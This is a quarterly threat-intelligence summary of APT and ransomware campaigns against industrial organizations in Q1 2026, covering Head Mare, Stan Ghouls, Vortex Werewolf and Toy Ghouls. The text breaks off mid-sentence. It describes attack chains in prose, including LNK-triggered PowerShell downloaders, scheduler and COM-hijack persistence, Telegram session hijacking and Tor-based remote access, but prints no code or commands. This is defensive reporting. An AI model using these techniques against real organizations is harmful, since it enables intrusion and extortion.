APT and financial attacks on industrial organizations in Q1 2026

21 May 2026 APT and financial attacks on industrial organizations in Q1 2026 This summary provides an overview of reports on APT and financial attacks on industrial enterprises disclosed in Q1 2026, as well as the related activities of groups observed attacking industrial organizations. For each topic, we summarize the key facts, findings and conclusions of researchers that we believe may be useful to professionals addressing practical issues of cybersecurity in industrial enterprises. Quarterly summary After analyzing technical papers relating to attacks on industrial enterprises published in Q1 2026 by cybersecurity research teams, it can be assumed that some of the alarming discoveries from the previous quarter – Q4 2025 – may signify new trends in the evolution of the threat landscape. One such new trend is cyberattacks on transportation and logistics companies aimed at physically stealing goods. The previously unknown Armenian-speaking group Diesel Vortex has chosen this cyber-physical method to monetize attacks on freight operators and logistics organizations in the USA and Europe. Another alarming trend that appears to be becoming part of everyday reality is the use of cyberattacks to gather information for planning and evaluating the effectiveness of military strikes. This appears to be evidenced by a Check Point Research publication. Some trends in the evolving threat landscape are driven by technical factors, such as the retooling of industrial enterprises and the latest technological advances that promise increased efficiency. For example, the growing popularity of Linux platforms is leading to an increased diversity of malicious tools designed for these platforms. In line with current technological advances, the number of cases involving the use of artificial intelligence in malware development and other stages of attacks targeting industrial enterprises is inevitably increasing. It has been almost 16 years since the first publications about Operation Olympic Games, better known as Stuxnet, which ushered in the era of cyber-physical attacks. It became clear then that the genie could not be put back in the bottle. Everyone expected new operations of this kind, perhaps even more technically complex, large-scale, and daring. However, there was no significant continuation that lived up to this expectation. Publications about new attacks were rare, and the malicious campaigns themselves were increasingly straightforward, with less sophisticated tools. The number of such campaigns was likely limited by factors of interstate relations, and the rejection of complex tools appears to have been largely dictated by rational and technical considerations. It has become apparent that industrial automation systems are much more vulnerable to attack than was believed just 10 years ago. Currently, most incidents involving cyberattacks on key production assets are caused by trivial information security issues within the affected organizations – as described by CERT Polska. However, as international political instability grows, the number of such incidents is increasing, the geographic scope of operations is expanding, and new players, sometimes associated with unexpected countries, are entering the arena. Targets in Russia Head Mare attacks Cybercriminal | Spear phishing | Compromised legitimate mailboxes | Exploitation of public-facing applications | Backdoor | Replacement of legitimate applications F6 researchers discovered a wave of malicious emails from the PhantomCore group (aka Head Mare), which they detected on January 19 and 21, 2026. The attackers used legitimate email addresses for their mailings, which suggests that these addresses may have been compromised. The campaign targeted Russian organizations in the housing utilities, finance, e-commerce, B2C, municipal services, aerospace, chemical, construction, manufacturing, and marketplace industries. The emails had the subject “?? ?? ????????????” (“Specifications for Approval”) and included an attachment called “?? ?? ???????????? ?? 54 ?? 19.01.26.zip” (“Specifications for Approval Sat 54 from 01/19/26.zip”) containing DOC and LNK files. The .doc file in the ZIP archive was a RAR archive containing a directory with the same name that contained files related to the actual document. After launching the LNK file, a cmd command was executed, initiating the download and execution of a PowerShell script. This script downloaded and displayed the decoy document, loaded the next-stage PowerShell script into memory, and established persistence for the next-stage script in Windows Task Scheduler. This next-stage PowerShell script was virtually identical to PhantomCore.PollDL (PhantomRemote). At the end of 2025, Kaspersky analysts identified a new malicious campaign targeting organizations in Russia in government, construction, and manufacturing sectors that they attributed to the Head Mare threat group. The campaign continued into early 2026. As part of this activity, the group once again expanded its toolset by introducing a new PowerShell-base backdoor named PhantomHeart. Initially distributed as a DLL, it was later reworked into a PowerShell script. PhantomHeart implements a remote access channel that combines HTTP communication with the C2 and the ability to deploy an SSH tunnel upon request. Its persistence mechanism is activated by launching via the task scheduler under the guise of a legitimate update script located in the LiteManager directory. The researchers also discovered that the group repurposed the previously known PhantomProxyLite tool and implemented it as a PowerShell script. The intrusion chain included the exploitation of the BDU:2025-10114 TrueConf vulnerability. In some cases, the group still used phishing emails. Kaspersky researchers also discovered a large-scale phishing campaign by the Head Mare group, this time using a new version of the PhantomCore (PhantomDL) backdoor. This new Head Mare campaign affected several hundred users from Russian organizations, including in the public sector and companies from the logistics, financial, and industrial sectors. Recipients received emails purporting to be from a research organization offering contracts. The attachments contained encrypted archives with a series of LNK files that automatically launched the process of downloading and installing a backdoor. When any of the shortcuts was launched, a command was executed to download an intermediate script written in PowerShell located on the attackers’ server. This script downloaded a new variant of PhantomCore written in C++ from a remote server, then downloaded and opened a decoy document, ensuring persistence in the system and enabling autorun. Persistence was achieved using the PSFactoryBuffer COM hijacking technique. The primary function of the new PhantomCore variant is to provide the attackers with a remote command prompt on the infected system. Once launched, the backdoor sends two POST requests to the C2 containing JSON data. In response, the attackers transmit a sequence of commands for the backdoor, including the command to download and unpack an archive. The archive contains a module for running ssh.exe, written in Golang. The module’s persistence is achieved in the system using a scheduler task. In March, Kaspersky researchers reported a new malware campaign by the Head Mare group targeting educational and scientific institutions, as well as energy sector organizations in Russia. The activity was detected in February 2026, but the campaign itself had been active since at least December 2025. Victims received a link inviting them to join a video conference. After clicking it, they were prompted to install a service to connect to the video call. During the installation process, the system was infected when a previously unknown backdoor named PhantomPxPigeon was installed on the victims’ machines. At the time of the report’s publication, the researchers also observed a new wave of similar activity, specifically a number of compromised TrueConf servers at various organizations in the transportation sector, as well as at scientific and educational institutions. The TrueConf client application distributions downloaded from these servers were replaced with malicious ones. The attack vector that led to the client application being replaced was unclear, but the attackers presumably exploited vulnerability BDU:2025-10116, identified by researchers and patched by the vendor in August 2025. The malicious distributions detected by Kaspersky did not have a valid digital signature. Stan Ghouls attacks Cybercriminal | Spear phishing | RAT | Backdoor | Linux malware The Stan Ghouls group (also known as Bloody Wolf) has been orchestrating targeted attacks against organizations within the Russian Federation, Kyrgyzstan, Kazakhstan, and Uzbekistan since at least 2023. This group is known for its well-prepared attacks tailored to specific victims, primarily from the manufacturing, finance, and IT sectors, specialized Java-based malicious downloaders, and substantial infrastructure with dedicated resources allocated for specific campaigns. Kaspersky researchers revealed that the group initiated new campaigns against more than 50 victims in Uzbekistan and a limited number of victims in the Russian Federation, Kazakhstan, Turkey, Serbia and Belarus, though the latter three were likely collateral damage. Researchers analyzed the group’s latest campaign and observed changes to the attackers’ infrastructure, including newly identified domains. The group used phishing emails containing malicious PDF attachments. Previously, Stan Ghouls utilized the malicious remote access Trojan (RAT) STRRAT (Strigoi Master) as its primary payload. However, last year the group shifted its focus and began employing legitimate software – NetSupport – as its tool of choice. Indicators suggesting that this group has incorporated Mirai IoT malware into its arsenal were also identified. Vortex Werewolf attacks New threat actor | APT | Spear phishing | Telegram phishing | Phishing websites | ?loud services infrastructure | Tor network In December 2025 and January 2026, BI.ZONE researchers detected malicious activity from a new Vortex Werewolf (aka SkyCloak) cluster targeting Russian organizations in the public administration and defense industries. Cyble and Seqrite reported that Vortex Werewolf had previously targeted Belarusian government and defense structures as well. According to network infrastructure research, Vortex Werewolf has been active since at least December 2024. The attackers use Cloudflare in their network infrastructure. The initial access method could not be determined, but it is believed that the attackers delivered malware via phishing emails and directly through the Telegram messenger. Victims were sent a link disguised as a Telegram address to download a document – an archive containing a malicious LNK file and an additional archive containing a set of files, including a PowerShell script. The phishing page simulated the process of downloading a file and initiated a procedure to restore access to the Telegram account. Users were asked to confirm their country code and enter their phone number, after which a confirmation code was sent to their Telegram app. If two-factor authentication was enabled for the account, the victim was also asked to enter their cloud password. This allowed Vortex Werewolf to obtain an active session of the user’s Telegram account. To increase the credibility of the attack, in some cases, the attackers placed a decoy document on the phishing page with intentionally blurred content. The Vortex Werewolf group uses GitHub Pages to host static JavaScript and CSS resources, with a separate repository containing those resources created for each phishing domain. After successfully verifying the entered code and password with two-factor authentication enabled, a link is generated. Clicking the link initiates the download of a ZIP archive hosted on Dropbox that contains an LNK file. Following a successful compromise, Tor and OpenSSH are installed on the system, using obfs4 bridges rather than public Tor entry nodes to communicate with the control infrastructure. Remote access is also configured through the Tor network using RDP, SMB, SFTP, and SSH. The malware persists in the Windows Task Scheduler by creating tasks. Researchers note that Vortex Werewolf resembles the Core Werewolf group (aka Awaken Likho). The clusters have similar targets and attack regions, and use SSH to establish remote access to compromised systems, as well as military-related decoy documents. However, BI.ZONE did not have sufficient data to definitively attribute Vortex Werewolf to Core Werewolf, so this activity is considered a separate threat cluster. Toy Ghouls attacks Cybercriminal | Ransomware | Linux malware | Exploitation of public facing applications | Trusted relationship Toy Ghouls (also known as Bearlyfy or laboo.boo) is a financially motivated group active since at least January 2025. The group exclusively targets Russian organizations with ransomware from the LockBit and RedAlert families for Windows systems, and Babuk for Linux and ESXI. The main industries targeted by the attackers are manufacturing, construction, automotive, and telecommunications. There are also indications of possible connections to the Head Mare group, based on the use of the same tools and network infrastructure. Kaspersky researchers analyzed their techniques and procedures using a unified kill chain methodology. A common initial access vector involves third-party contractors, where the attackers leverage stolen user certificates to authenticate to a customer’s VPN. After establishing VPN access, they use RDP to connect to internal systems and traverse the victim’s environment further. The Toy Ghouls group often exploits vulnerable 1C servers by uploading 1C-Shells via separate .epf files. To discover the internal network, the attackers use SoftPerfect Network Scanner and fscan, which can search for and exploit vulnerabilities. Toy Ghouls uses scheduled tasks to execute its activities on compromised hosts, PowerShell to execute malicious scripts, and the Windows command shell and Bash to execute commands on *nix systems. F6 researchers also tracked the latest activity of the Bearlyfy/Toy Ghouls group, which has carried out over 70 attacks on Russian companies since its emergence. Bearlyfy initially used LockBit 3 Black for Windows and its own modified version of the Babuk ransomware to encrypt data on Linux systems. Since May 2025, several attacks have used a slightly modified version of the PolyVice ransomware from the well-known RaaS Vice Society. According to F6, since March 2026, Bearlyfy began using its own ransomware program for Windows called GenieLocker. Its cryptographic scheme and approaches are clearly borrowed from the Venus/Trinity families of ransomware. F6 believes the malware a